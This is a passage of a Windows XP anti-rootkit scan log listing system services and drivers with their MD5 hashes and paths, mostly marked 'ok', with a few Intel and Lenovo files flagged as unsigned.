16:57:58.0906 2464  Mouclass - ok

16:57:58.0921 2464  [ 66A6F73C74E1791464160A7065CE711A ] mouhid          C:\WINDOWS\system32\DRIVERS\mouhid.sys

16:57:59.0015 2464  mouhid - ok

16:57:59.0015 2464  [ A80B9A0BAD1B73637DBCBBA7DF72D3FD ] MountMgr        C:\WINDOWS\system32\drivers\MountMgr.sys

16:57:59.0109 2464  MountMgr - ok

16:57:59.0109 2464  mraid35x - ok

16:57:59.0140 2464  [ 11D42BB6206F33FBB3BA0288D3EF81BD ] MRxDAV          C:\WINDOWS\system32\DRIVERS\mrxdav.sys

16:57:59.0234 2464  MRxDAV - ok

16:57:59.0265 2464  [ 7D304A5EB4344EBEEAB53A2FE3FFB9F0 ] MRxSmb          C:\WINDOWS\system32\DRIVERS\mrxsmb.sys

16:57:59.0328 2464  MRxSmb - ok

16:57:59.0375 2464  [ 35A031AF38C55F92D28AA03EE9F12CC9 ] MSDTC           C:\WINDOWS\system32\msdtc.exe

16:57:59.0468 2464  MSDTC - ok

16:57:59.0484 2464  [ C941EA2454BA8350021D774DAF0F1027 ] Msfs            C:\WINDOWS\system32\drivers\Msfs.sys

16:57:59.0578 2464  Msfs - ok

16:57:59.0578 2464  MSIServer - ok

16:57:59.0593 2464  [ D1575E71568F4D9E14CA56B7B0453BF1 ] MSKSSRV         C:\WINDOWS\system32\drivers\MSKSSRV.sys

16:57:59.0687 2464  MSKSSRV - ok

16:57:59.0687 2464  [ 325BB26842FC7CCC1FCCE2C457317F3E ] MSPCLOCK        C:\WINDOWS\system32\drivers\MSPCLOCK.sys

16:57:59.0781 2464  MSPCLOCK - ok

16:57:59.0781 2464  [ BAD59648BA099DA4A17680B39730CB3D ] MSPQM           C:\WINDOWS\system32\drivers\MSPQM.sys

16:57:59.0875 2464  MSPQM - ok

16:57:59.0906 2464  [ AF5F4F3F14A8EA2C26DE30F7A1E17136 ] mssmbios        C:\WINDOWS\system32\DRIVERS\mssmbios.sys

16:57:59.0984 2464  mssmbios - ok

16:57:59.0984 2464  [ E53736A9E30C45FA9E7B5EAC55056D1D ] MSTEE           C:\WINDOWS\system32\drivers\MSTEE.sys

16:58:00.0078 2464  MSTEE - ok

16:58:00.0093 2464  [ DE6A75F5C270E756C5508D94B6CF68F5 ] Mup             C:\WINDOWS\system32\drivers\Mup.sys

16:58:00.0125 2464  Mup - ok

16:58:00.0140 2464  [ 5B50F1B2A2ED47D560577B221DA734DB ] NABTSFEC        C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys

16:58:00.0234 2464  NABTSFEC - ok

16:58:00.0250 2464  [ 46BB15AE2AC7D025D6D2567B876817BD ] napagent        C:\WINDOWS\System32\qagentrt.dll

16:58:00.0343 2464  napagent - ok

16:58:00.0359 2464  [ 1DF7F42665C94B825322FAE71721130D ] NDIS            C:\WINDOWS\system32\drivers\NDIS.sys

16:58:00.0453 2464  NDIS - ok

16:58:00.0453 2464  [ 7FF1F1FD8609C149AA432F95A8163D97 ] NdisIP          C:\WINDOWS\system32\DRIVERS\NdisIP.sys

16:58:00.0531 2464  NdisIP - ok

16:58:00.0562 2464  [ 0109C4F3850DFBAB279542515386AE22 ] NdisTapi        C:\WINDOWS\system32\DRIVERS\ndistapi.sys

16:58:00.0593 2464  NdisTapi - ok

16:58:00.0640 2464  [ F927A4434C5028758A842943EF1A3849 ] Ndisuio         C:\WINDOWS\system32\DRIVERS\ndisuio.sys

16:58:00.0718 2464  Ndisuio - ok

16:58:00.0718 2464  [ EDC1531A49C80614B2CFDA43CA8659AB ] NdisWan         C:\WINDOWS\system32\DRIVERS\ndiswan.sys

16:58:00.0812 2464  NdisWan - ok

16:58:00.0843 2464  [ 9282BD12DFB069D3889EB3FCC1000A9B ] NDProxy         C:\WINDOWS\system32\drivers\NDProxy.sys

16:58:00.0859 2464  NDProxy - ok

16:58:00.0890 2464  [ 5D81CF9A2F1A3A756B66CF684911CDF0 ] NetBIOS         C:\WINDOWS\system32\DRIVERS\netbios.sys

16:58:00.0968 2464  NetBIOS - ok

16:58:01.0000 2464  [ 74B2B2F5BEA5E9A3DC021D685551BD3D ] NetBT           C:\WINDOWS\system32\DRIVERS\netbt.sys

16:58:01.0078 2464  NetBT - ok

16:58:01.0109 2464  [ 8ACE4251BFFD09CE75679FE940E996CC ] NetDDE          C:\WINDOWS\system32\netdde.exe

16:58:01.0203 2464  NetDDE - ok

16:58:01.0203 2464  [ 8ACE4251BFFD09CE75679FE940E996CC ] NetDDEdsdm      C:\WINDOWS\system32\netdde.exe

16:58:01.0296 2464  NetDDEdsdm - ok

16:58:01.0328 2464  [ AFB8261B56CBA0D86AEB6DF682AF9785 ] Netlogon        C:\WINDOWS\system32\lsass.exe

16:58:01.0421 2464  Netlogon - ok

16:58:01.0421 2464  [ E6D88F1F6745BF00B57E7855A2AB696C ] Netman          C:\WINDOWS\System32\netman.dll

16:58:01.0515 2464  Netman - ok

16:58:01.0562 2464  [ D34612C5D02D026535B3095D620626AE ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe

16:58:01.0578 2464  NetTcpPortSharing - ok

16:58:01.0640 2464  [ F43DA6B7E26FFF9AC4D3210F2F9B5D8C ] NETw3x32        C:\WINDOWS\system32\DRIVERS\NETw3x32.sys

16:58:01.0781 2464  NETw3x32 - ok

16:58:01.0812 2464  [ E9E47CFB2D461FA0FC75B7A74C6383EA ] NIC1394         C:\WINDOWS\system32\DRIVERS\nic1394.sys

16:58:01.0906 2464  NIC1394 - ok

16:58:01.0921 2464  [ F1B67B6B0751AE0E6E964B02821206A3 ] Nla             C:\WINDOWS\System32\mswsock.dll

16:58:01.0968 2464  Nla - ok

16:58:01.0968 2464  [ 3182D64AE053D6FB034F44B6DEF8034A ] Npfs            C:\WINDOWS\system32\drivers\Npfs.sys

16:58:02.0046 2464  Npfs - ok

16:58:02.0078 2464  [ 78A08DD6A8D65E697C18E1DB01C5CDCA ] Ntfs            C:\WINDOWS\system32\drivers\Ntfs.sys

16:58:02.0203 2464  Ntfs - ok

16:58:02.0218 2464  [ AFB8261B56CBA0D86AEB6DF682AF9785 ] NtLmSsp         C:\WINDOWS\system32\lsass.exe

16:58:02.0296 2464  NtLmSsp - ok

16:58:02.0343 2464  [ 56AF4064996FA5BAC9C449B1514B4770 ] NtmsSvc         C:\WINDOWS\system32\ntmssvc.dll

16:58:02.0468 2464  NtmsSvc - ok

16:58:02.0500 2464  [ 73C1E1F395918BC2C6DD67AF7591A3AD ] Null            C:\WINDOWS\system32\drivers\Null.sys

16:58:02.0578 2464  Null - ok

16:58:02.0578 2464  [ B305F3FAD35083837EF46A0BBCE2FC57 ] NwlnkFlt        C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys

16:58:02.0671 2464  NwlnkFlt - ok

16:58:02.0687 2464  [ C99B3415198D1AAB7227F2C88FD664B9 ] NwlnkFwd        C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys

16:58:02.0765 2464  NwlnkFwd - ok

16:58:02.0843 2464  [ 84DE1DD996B48B05ACE31AD015FA108A ] odserv          C:\Programme\Gemeinsame Dateien\Microsoft Shared\OFFICE12\ODSERV.EXE

16:58:02.0859 2464  odserv - ok

16:58:02.0906 2464  [ 7AF6EC0EA4261ECF7DA084103BE31EA8 ] odysseyIM4      C:\WINDOWS\system32\DRIVERS\odysseyIM4.sys

16:58:02.0937 2464  odysseyIM4 - ok

16:58:02.0968 2464  [ CA33832DF41AFB202EE7AEB05145922F ] ohci1394        C:\WINDOWS\system32\DRIVERS\ohci1394.sys

16:58:03.0062 2464  ohci1394 - ok

16:58:03.0093 2464  [ 5A432A042DAE460ABE7199B758E8606C ] ose             C:\Programme\Gemeinsame Dateien\Microsoft Shared\Source Engine\OSE.EXE

16:58:03.0109 2464  ose - ok

16:58:03.0140 2464  [ F84785660305B9B903FB3BCA8BA29837 ] Parport         C:\WINDOWS\system32\drivers\Parport.sys

16:58:03.0218 2464  Parport - ok

16:58:03.0218 2464  [ BEB3BA25197665D82EC7065B724171C6 ] PartMgr         C:\WINDOWS\system32\drivers\PartMgr.sys

16:58:03.0296 2464  PartMgr - ok

16:58:03.0328 2464  [ C2BF987829099A3EAA2CA6A0A90ECB4F ] ParVdm          C:\WINDOWS\system32\drivers\ParVdm.sys

16:58:03.0437 2464  ParVdm - ok

16:58:03.0437 2464  [ 387E8DEDC343AA2D1EFBC30580273ACD ] PCI             C:\WINDOWS\system32\DRIVERS\pci.sys

16:58:03.0515 2464  PCI - ok

16:58:03.0531 2464  PCIDump - ok

16:58:03.0546 2464  [ 59BA86D9A61CBCF4DF8E598C331F5B82 ] PCIIde          C:\WINDOWS\system32\DRIVERS\pciide.sys

16:58:03.0640 2464  PCIIde - ok

16:58:03.0656 2464  [ A2A966B77D61847D61A3051DF87C8C97 ] Pcmcia          C:\WINDOWS\system32\drivers\Pcmcia.sys

16:58:03.0734 2464  Pcmcia - ok

16:58:03.0734 2464  PDCOMP - ok

16:58:03.0734 2464  PDFRAME - ok

16:58:03.0734 2464  PDRELI - ok

16:58:03.0750 2464  PDRFRAME - ok

16:58:03.0750 2464  perc2 - ok

16:58:03.0750 2464  perc2hib - ok

16:58:03.0796 2464  [ A3EDBE9053889FB24AB22492472B39DC ] PlugPlay        C:\WINDOWS\system32\services.exe

16:58:03.0828 2464  PlugPlay - ok

16:58:03.0859 2464  [ C6114CCD63DB3925A0450B1089ECE503 ] PMHler          C:\WINDOWS\system32\drivers\PMHler.sys

16:58:03.0875 2464  PMHler - ok

16:58:03.0906 2464  [ 29A26236447E5B5E3FCE5E33168C43E0 ] PMSveH          C:\Programme\Lenovo\PM Driver\PMSveH.exe

16:58:03.0921 2464  PMSveH ( UnsignedFile.Multi.Generic ) - warning

16:58:03.0921 2464  PMSveH - detected UnsignedFile.Multi.Generic (1)

16:58:03.0937 2464  [ AFB8261B56CBA0D86AEB6DF682AF9785 ] PolicyAgent     C:\WINDOWS\system32\lsass.exe

16:58:04.0015 2464  PolicyAgent - ok

16:58:04.0046 2464  [ EFEEC01B1D3CF84F16DDD24D9D9D8F99 ] PptpMiniport    C:\WINDOWS\system32\DRIVERS\raspptp.sys

16:58:04.0140 2464  PptpMiniport - ok

16:58:04.0140 2464  [ AFB8261B56CBA0D86AEB6DF682AF9785 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe

16:58:04.0218 2464  ProtectedStorage - ok

16:58:04.0234 2464  [ 09298EC810B07E5D582CB3A3F9255424 ] PSched          C:\WINDOWS\system32\DRIVERS\psched.sys

16:58:04.0312 2464  PSched - ok

16:58:04.0328 2464  [ 80D317BD1C3DBC5D4FE7B1678C60CADD ] Ptilink         C:\WINDOWS\system32\DRIVERS\ptilink.sys

16:58:04.0421 2464  Ptilink - ok

16:58:04.0421 2464  ql1080 - ok

16:58:04.0437 2464  Ql10wnt - ok

16:58:04.0437 2464  ql12160 - ok

16:58:04.0437 2464  ql1240 - ok

16:58:04.0437 2464  ql1280 - ok

16:58:04.0453 2464  [ FE0D99D6F31E4FAD8159F690D68DED9C ] RasAcd          C:\WINDOWS\system32\DRIVERS\rasacd.sys

16:58:04.0546 2464  RasAcd - ok

16:58:04.0578 2464  [ F5BA6CACCDB66C8F048E867563203246 ] RasAuto         C:\WINDOWS\System32\rasauto.dll

16:58:04.0671 2464  RasAuto - ok

16:58:04.0703 2464  [ 11B4A627BC9614B885C4969BFA5FF8A6 ] Rasl2tp         C:\WINDOWS\system32\DRIVERS\rasl2tp.sys

16:58:04.0781 2464  Rasl2tp - ok

16:58:04.0828 2464  [ F9A7B66EA345726EDB5862A46B1ECCD5 ] RasMan          C:\WINDOWS\System32\rasmans.dll

16:58:04.0906 2464  RasMan - ok

16:58:04.0921 2464  [ 5BC962F2654137C9909C3D4603587DEE ] RasPppoe        C:\WINDOWS\system32\DRIVERS\raspppoe.sys

16:58:05.0000 2464  RasPppoe - ok

16:58:05.0015 2464  [ FDBB1D60066FCFBB7452FD8F9829B242 ] Raspti          C:\WINDOWS\system32\DRIVERS\raspti.sys

16:58:05.0093 2464  Raspti - ok

16:58:05.0109 2464  [ 7AD224AD1A1437FE28D89CF22B17780A ] Rdbss           C:\WINDOWS\system32\DRIVERS\rdbss.sys

16:58:05.0203 2464  Rdbss - ok

16:58:05.0203 2464  [ 4912D5B403614CE99C28420F75353332 ] RDPCDD          C:\WINDOWS\system32\DRIVERS\RDPCDD.sys

16:58:05.0296 2464  RDPCDD - ok

16:58:05.0328 2464  [ 15CABD0F7C00C47C70124907916AF3F1 ] rdpdr           C:\WINDOWS\system32\DRIVERS\rdpdr.sys

16:58:05.0421 2464  rdpdr - ok

16:58:05.0453 2464  [ 43AF5212BD8FB5BA6EED9754358BD8F7 ] RDPWD           C:\WINDOWS\system32\drivers\RDPWD.sys

16:58:05.0500 2464  RDPWD - ok

16:58:05.0531 2464  [ 263AF18AF0F3DB99F574C95F284CCEC9 ] RDSessMgr       C:\WINDOWS\system32\sessmgr.exe

16:58:05.0640 2464  RDSessMgr - ok

16:58:05.0656 2464  [ ED761D453856F795A7FE056E42C36365 ] redbook         C:\WINDOWS\system32\DRIVERS\redbook.sys

16:58:05.0734 2464  redbook - ok

16:58:05.0765 2464  [ 38E771154092ED59BF1149E24E2A7DC3 ] RegSrvc         C:\Programme\Intel\Wireless\Bin\RegSrvc.exe

16:58:05.0796 2464  RegSrvc ( UnsignedFile.Multi.Generic ) - warning

16:58:05.0796 2464  RegSrvc - detected UnsignedFile.Multi.Generic (1)

16:58:05.0828 2464  [ 0E97EC96D6942CEEC2D188CC2EB69A01 ] RemoteAccess    C:\WINDOWS\System32\mprdim.dll

16:58:05.0921 2464  RemoteAccess - ok

16:58:05.0953 2464  [ E4CD1F3D84E1C2CA0B8CF7501E201593 ] RemoteRegistry  C:\WINDOWS\system32\regsvc.dll

16:58:06.0046 2464  RemoteRegistry - ok

16:58:06.0078 2464  [ 355AAC141B214BEF1DBC1483AFD9BD50 ] rimmptsk        C:\WINDOWS\system32\DRIVERS\rimmptsk.sys

16:58:06.0093 2464  rimmptsk - ok

16:58:06.0109 2464  [ A4216C71DD4F60B26418CCFD99CD0815 ] rimsptsk        C:\WINDOWS\system32\DRIVERS\rimsptsk.sys

16:58:06.0125 2464  rimsptsk - ok

16:58:06.0125 2464  [ C663AF77E2F4EABF8EB08B388D2F1F36 ] rismxdp         C:\WINDOWS\system32\DRIVERS\rixdptsk.sys

16:58:06.0140 2464  rismxdp - ok

16:58:06.0171 2464  [ 2A02E21867497DF20B8FC95631395169 ] RpcLocator      C:\WINDOWS\system32\locator.exe

16:58:06.0265 2464  RpcLocator - ok

16:58:06.0312 2464  [ 3127AFBF2C1ED0AB14A1BBB7AAECB85B ] RpcSs           C:\WINDOWS\system32\rpcss.dll

16:58:06.0343 2464  RpcSs - ok

16:58:06.0375 2464  [ 4BDD71B4B521521499DFD14735C4F398 ] RSVP            C:\WINDOWS\system32\rsvp.exe

16:58:06.0468 2464  RSVP - ok

16:58:06.0515 2464  [ A6B39F6B755F118927CE7D17FB8FC1E2 ] S24EventMonitor C:\Programme\Intel\Wireless\Bin\S24EvMon.exe

16:58:06.0593 2464  S24EventMonitor ( UnsignedFile.Multi.Generic ) - warning

16:58:06.0593 2464  S24EventMonitor - detected UnsignedFile.Multi.Generic (1)

16:58:06.0609 2464  [ DECEE0D67D032B57C1F5EF649A67A967 ] s24trans        C:\WINDOWS\system32\DRIVERS\s24trans.sys

16:58:06.0609 2464  s24trans ( UnsignedFile.Multi.Generic ) - warning

16:58:06.0609 2464  s24trans - detected UnsignedFile.Multi.Generic (1)

16:58:06.0625 2464  [ AFB8261B56CBA0D86AEB6DF682AF9785 ] SamSs           C:\WINDOWS\system32\lsass.exe

16:58:06.0703 2464  SamSs - ok

16:58:06.0750 2464  [ 39763504067962108505BFF25F024345 ] SASDIFSV        C:\Programme\SUPERAntiSpyware\SASDIFSV.SYS

16:58:06.0765 2464  SASDIFSV - ok

16:58:06.0781 2464  [ 77B9FC20084B48408AD3E87570EB4A85 ] SASKUTIL        C:\Programme\SUPERAntiSpyware\SASKUTIL.SYS

16:58:06.0796 2464  SASKUTIL - ok

16:58:06.0828 2464  [ DCEC079FAD95D36C8DD5CB6D779DFE32 ] SCardSvr        C:\WINDOWS\System32\SCardSvr.exe

16:58:06.0906 2464  SCardSvr - ok

16:58:06.0953 2464  [ A050194A44D7FA8D7186ED2F4E8367AE ] Schedule        C:\WINDOWS\system32\schedsvc.dll

16:58:07.0046 2464  Schedule - ok

16:58:07.0078 2464  [ 8D04819A3CE51B9EB47E5689B44D43C4 ] sdbus           C:\WINDOWS\system32\DRIVERS\sdbus.sys

16:58:07.0156 2464  sdbus - ok

16:58:07.0171 2464  [ 90A3935D05B494A5A39D37E71F09A677 ] Secdrv          C:\WINDOWS\system32\DRIVERS\secdrv.sys

16:58:07.0250 2464  Secdrv - ok

16:58:07.0250 2464  [ BEE4CFD1D48C23B44CF4B974B0B79B2B ] seclogon        C:\WINDOWS\System32\seclogon.dll

16:58:07.0343 2464  seclogon - ok

16:58:07.0343 2464  [ 2AAC9B6ED9EDDFFB721D6452E34D67E3 ] SENS            C:\WINDOWS\system32\sens.dll

16:58:07.0437 2464  SENS - ok

16:58:07.0453 2464  [ CF24EB4F0412C82BCD1F4F35A025E31D ] Serial          C:\WINDOWS\system32\drivers\Serial.sys

16:58:07.0546 2464  Serial - ok

16:58:07.0562 2464  [ 8E6B8C671615D126FDC553D1E2DE5562 ] Sfloppy         C:\WINDOWS\system32\drivers\Sfloppy.sys

16:58:07.0656 2464  Sfloppy - ok

16:58:07.0703 2464  [ CAD058D5F8B889A87CA3EB3CF624DCEF ] SharedAccess    C:\WINDOWS\System32\ipnathlp.dll

16:58:07.0796 2464  SharedAccess - ok

16:58:07.0812 2464  [ 2DB7D303C36DDD055215052F118E8E75 ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll

16:58:07.0843 2464  ShellHWDetection - ok

16:58:07.0843 2464  Simbad - ok

16:58:08.0000 2464  [ 753D254205E0A62100A050BD8B458D06 ] Skype C2C Service C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Skype\Toolbars\Skype C2C Service\c2c_service.exe

16:58:08.0203 2464  Skype C2C Service - ok

16:58:08.0250 2464  [ F07AF60B152221472FBDB2FECEC4896D ] SkypeUpdate     C:\Programme\Skype\Updater\Updater.exe

16:58:08.0250 2464  SkypeUpdate - ok

16:58:08.0281 2464  [ 866D538EBE33709A5C9F5C62B73B7D14 ] SLIP            C:\WINDOWS\system32\DRIVERS\SLIP.sys

16:58:08.0359 2464  SLIP - ok

16:58:08.0375 2464  Sparrow - ok

16:58:08.0406 2464  [ AB8B92451ECB048A4D1DE7C3FFCB4A9F ] splitter        C:\WINDOWS\system32\drivers\splitter.sys

16:58:08.0484 2464  splitter - ok

16:58:08.0515 2464  [ 60784F891563FB1B767F70117FC2428F ] Spooler         C:\WINDOWS\system32\spoolsv.exe

16:58:08.0578 2464  Spooler - ok

16:58:08.0593 2464  [ 50FA898F8C032796D3B1B9951BB5A90F ] sr              C:\WINDOWS\system32\DRIVERS\sr.sys

16:58:08.0687 2464  sr - ok

16:58:08.0718 2464  [ FE77A85495065F3AD59C5C65B6C54182 ] srservice       C:\WINDOWS\system32\srsvc.dll

16:58:08.0812 2464  srservice - ok

16:58:08.0859 2464  [ 47DDFC2F003F7F9F0592C6874962A2E7 ] Srv             C:\WINDOWS\system32\DRIVERS\srv.sys

16:58:08.0906 2464  Srv - ok

16:58:08.0937 2464  [ 4DF5B05DFAEC29E13E1ED6F6EE12C500 ] SSDPSRV         C:\WINDOWS\System32\ssdpsrv.dll

16:58:09.0031 2464  SSDPSRV - ok

16:58:09.0046 2464  [ BC2C5985611C5356B24AEB370953DED9 ] stisvc          C:\WINDOWS\system32\wiaservc.dll

16:58:09.0171 2464  stisvc - ok

16:58:09.0203 2464  [ 77813007BA6265C4B6098187E6ED79D2 ] streamip        C:\WINDOWS\system32\DRIVERS\StreamIP.sys

16:58:09.0296 2464  streamip - ok

16:58:09.0312 2464  [ 3941D127AEF12E93ADDF6FE6EE027E0F ] swenum          C:\WINDOWS\system32\DRIVERS\swenum.sys

16:58:09.0390 2464  swenum - ok

16:58:09.0406 2464  [ 8CE882BCC6CF8A62F2B2323D95CB3D01 ] swmidi          C:\WINDOWS\system32\drivers\swmidi.sys

16:58:09.0484 2464  swmidi - ok

16:58:09.0484 2464  SwPrv - ok

16:58:09.0484 2464  symc810 - ok

16:58:09.0484 2464  symc8xx - ok

16:58:09.0500 2464  sym_hi - ok

16:58:09.0500 2464  sym_u3 - ok

16:58:09.0546 2464  [ AE4052FC36BD4C390CEE45A38EC1199A ] SynTP           C:\WINDOWS\system32\DRIVERS\SynTP.sys

16:58:09.0578 2464  SynTP - ok

16:58:09.0578 2464  [ 8B83F3ED0F1688B4958F77CD6D2BF290 ] sysaudio        C:\WINDOWS\system32\drivers\sysaudio.sys

16:58:09.0671 2464  sysaudio - ok

16:58:09.0687 2464  [ 2903FFFA2523926D6219428040DCE6B9 ] SysmonLog       C:\WINDOWS\system32\smlogsvc.exe

16:58:09.0781 2464  SysmonLog - ok

16:58:09.0828 2464  [ 05903CAC4B98908D55EA5774775B382E ] TapiSrv         C:\WINDOWS\System32\tapisrv.dll

16:58:09.0921 2464  TapiSrv - ok

16:58:09.0968 2464  [ 9AEFA14BD6B182D61E3119FA5F436D3D ] Tcpip           C:\WINDOWS\system32\DRIVERS\tcpip.sys

16:58:10.0015 2464  Tcpip - ok

16:58:10.0046 2464  [ 6471A66807F5E104E4885F5B67349397 ] TDPIPE          C:\WINDOWS\system32\drivers\TDPIPE.sys

16:58:10.0125 2464  TDPIPE - ok

16:58:10.0125 2464  [ C56B6D0402371CF3700EB322EF3AAF61 ] TDTCP           C:\WINDOWS\system32\drivers\TDTCP.sys

16:58:10.0234 2464  TDTCP - ok

16:58:10.0234 2464  [ 88155247177638048422893737429D9E ] TermDD          C:\WINDOWS\system32\DRIVERS\termdd.sys

16:58:10.0343 2464  TermDD - ok

16:58:10.0343 2464  [ B7DE02C863D8F5A005A7BF375375A6A4 ] TermService     C:\WINDOWS\System32\termsrv.dll

16:58:10.0453 2464  TermService - ok

16:58:10.0468 2464  [ 2DB7D303C36DDD055215052F118E8E75 ] Themes          C:\WINDOWS\System32\shsvcs.dll

16:58:10.0484 2464  Themes - ok

16:58:10.0515 2464  [ 03681A1CE77F51586903869A5AB1DEAB ] TlntSvr         C:\WINDOWS\system32\tlntsvr.exe

16:58:10.0609 2464  TlntSvr - ok

16:58:10.0625 2464  TosIde - ok

16:58:10.0640 2464  [ 626504572B175867F30F3215C04B3E2F ] TrkWks          C:\WINDOWS\system32\trkwks.dll

16:58:10.0734 2464  TrkWks - ok

16:58:10.0859 2464  [ AF5F31156EE89D35AD6EC3179A805D23 ] TuneUp.UtilitiesSvc C:\Programme\TuneUp Utilities 2012\TuneUpUtilitiesService32.exe

16:58:10.0906 2464  TuneUp.UtilitiesSvc - ok

16:58:10.0953 2464  [ F2107C9D85EC0DF116939CCCE06AE697 ] TuneUpUtilitiesDrv C:\Programme\TuneUp Utilities 2012\TuneUpUtilitiesDriver32.sys

16:58:10.0968 2464  TuneUpUtilitiesDrv - ok

16:58:11.0000 2464  [ 5787B80C2E3C5E2F56C2A233D91FA2C9 ] Udfs            C:\WINDOWS\system32\drivers\Udfs.sys

16:58:11.0093 2464  Udfs - ok

16:58:11.0093 2464  ultra - ok

16:58:11.0140 2464  [ 402DDC88356B1BAC0EE3DD1580C76A31 ] Update          C:\WINDOWS\system32\DRIVERS\update.sys

16:58:11.0234 2464  Update - ok

16:58:11.0265 2464  [ 1DFD8975D8C89214B98D9387C1125B49 ] upnphost        C:\WINDOWS\System32\upnphost.dll

16:58:11.0359 2464  upnphost - ok

16:58:11.0390 2464  [ 9B11E6118958E63E1FEF129466E2BDA7 ] UPS             C:\WINDOWS\System32\ups.exe

16:58:11.0484 2464  UPS - ok

16:58:11.0515 2464  [ 173F317CE0DB8E21322E71B7E60A27E8 ] usbccgp         C:\WINDOWS\system32\DRIVERS\usbccgp.sys

16:58:11.0609 2464  usbccgp - ok

16:58:11.0609 2464  [ 65DCF09D0E37D4C6B11B5B0B76D470A7 ] usbehci         C:\WINDOWS\system32\DRIVERS\usbehci.sys

16:58:11.0703 2464  usbehci - ok

16:58:11.0703 2464  [ 1AB3CDDE553B6E064D2E754EFE20285C ] usbhub          C:\WINDOWS\system32\DRIVERS\usbhub.sys

16:58:11.0781 2464  usbhub - ok

16:58:11.0812 2464  [ A717C8721046828520C9EDF31288FC00 ] usbprint        C:\WINDOWS\system32\DRIVERS\usbprint.sys

16:58:11.0890 2464  usbprint - ok

16:58:11.0937 2464  [ A0B8CF9DEB1184FBDD20784A58FA75D4 ] usbscan         C:\WINDOWS\system32\DRIVERS\usbscan.sys

16:58:12.0015 2464  usbscan - ok

16:58:12.0046 2464  [ A32426D9B14A089EAA1D922E0C5801A9 ] USBSTOR         C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS

16:58:12.0140 2464  USBSTOR - ok

16:58:12.0171 2464  [ 26496F9DEE2D787FC3E61AD54821FFE6 ] usbuhci         C:\WINDOWS\system32\DRIVERS\usbuhci.sys

16:58:12.0250 2464  usbuhci - ok

16:58:12.0265 2464  [ 63BBFCA7F390F4C49ED4B96BFB1633E0 ] usbvideo        C:\WINDOWS\system32\Drivers\usbvideo.sys

16:58:12.0359 2464  usbvideo - ok

16:58:12.0375 2464  [ 6275822AC454A8A831D063841A4DBB5D ] UxTuneUp        C:\WINDOWS\System32\uxtuneup.dll

16:58:12.0390 2464  UxTuneUp - ok

16:58:12.0421 2464  [ 0D3A8FAFCEACD8B7625CD549757A7DF1 ] VgaSave         C:\WINDOWS\System32\drivers\vga.sys

16:58:12.0500 2464  VgaSave - ok

16:58:12.0515 2464  ViaIde - ok

16:58:12.0515 2464  [ A5A712F4E880874A477AF790B5186E1D ] VolSnap         C:\WINDOWS\system32\drivers\VolSnap.sys

16:58:12.0593 2464  VolSnap - ok

16:58:12.0640 2464  [ 9D889B338356B1BD1242B8841E0744A4 ] Vsdatant        C:\WINDOWS\system32\vsdatant.sys

16:58:12.0687 2464  Vsdatant - ok

16:58:12.0718 2464  vsmon - ok

16:58:12.0750 2464  [ 68F106273BE29E7B7EF8266977268E78 ] VSS             C:\WINDOWS\System32\vssvc.exe

16:58:12.0859 2464  VSS - ok

16:58:12.0875 2464  [ 7B353059E665F8B7AD2BBEAEF597CF45 ] W32Time         C:\WINDOWS\system32\w32time.dll

16:58:12.0968 2464  W32Time - ok

16:58:13.0000 2464  [ E20B95BAEDB550F32DD489265C1DA1F6 ] Wanarp          C:\WINDOWS\system32\DRIVERS\wanarp.sys

16:58:13.0093 2464  Wanarp - ok

16:58:13.0140 2464  [ BBCFEAB7E871CDDAC2D397EE7FA91FDC ] Wdf01000        C:\WINDOWS\system32\Drivers\wdf01000.sys

16:58:13.0187 2464  Wdf01000 - ok

16:58:13.0187 2464  WDICA - ok

16:58:13.0187 2464  [ 6768ACF64B18196494413695F0C3A00F ] wdmaud          C:\WINDOWS\system32\drivers\wdmaud.sys

16:58:13.0281 2464  wdmaud - ok

16:58:13.0296 2464  [ 81727C9873E3905A2FFC1EBD07265002 ] WebClient       C:\WINDOWS\System32\webclnt.dll

16:58:13.0390 2464  WebClient - ok

16:58:13.0468 2464  [ 6F3F3973D97714CC5F906A19FE883729 ] winmgmt         C:\WINDOWS\system32\wbem\WMIsvc.dll

16:58:13.0562 2464  winmgmt - ok

16:58:13.0562 2464  wltrysvc - ok

16:58:13.0593 2464  [ 6E18978B749F0696A774DE3F2CB142DD ] WmdmPmSN        C:\WINDOWS\system32\mspmsnsv.dll

16:58:13.0671 2464  WmdmPmSN - ok

16:58:13.0703 2464  [ FFA4D901D46D07A5BAB2D8307FBB51A6 ] Wmi             C:\WINDOWS\System32\advapi32.dll

16:58:13.0765 2464  Wmi - ok

16:58:13.0796 2464  [ C42584FD66CE9E17403AEBCA199F7BDB ] WmiAcpi         C:\WINDOWS\system32\DRIVERS\wmiacpi.sys

16:58:13.0875 2464  WmiAcpi - ok

16:58:13.0890 2464  [ 93908111BA57A6E60EC2FA2DE202105C ] WmiApSrv        C:\WINDOWS\system32\wbem\wmiapsrv.exe

16:58:13.0984 2464  WmiApSrv - ok

16:58:14.0015 2464  [ 300B3E84FAF1A5C1F791C159BA28035D ] wscsvc          C:\WINDOWS\system32\wscsvc.dll

16:58:14.0109 2464  wscsvc - ok

16:58:14.0125 2464  [ C98B39829C2BBD34E454150633C62C78 ] WSTCODEC        C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS

16:58:14.0203 2464  WSTCODEC - ok

16:58:14.0203 2464  [ 7B4FE05202AA6BF9F4DFD0E6A0D8A085 ] wuauserv        C:\WINDOWS\system32\wuauserv.dll

16:58:14.0296 2464  wuauserv - ok

16:58:14.0343 2464  [ C4F109C005F6725162D2D12CA751E4A7 ] WZCSVC          C:\WINDOWS\System32\wzcsvc.dll

16:58:14.0453 2464  WZCSVC - ok

16:58:14.0468 2464  [ 0ADA34871A2E1CD2CAAFED1237A47750 ] xmlprov         C:\WINDOWS\System32\xmlprov.dll

16:58:14.0546 2464  xmlprov - ok

16:58:14.0562 2464  ZTEusbmdm6k - ok

16:58:14.0562 2464  ZTEusbnmea - ok

16:58:14.0562 2464  ZTEusbser6k - ok

16:58:14.0578 2464  ================ Scan global ===============================

16:58:14.0593 2464  [ 2C60091CA5F67C3032EAB3B30390C27F ] C:\WINDOWS\system32\basesrv.dll

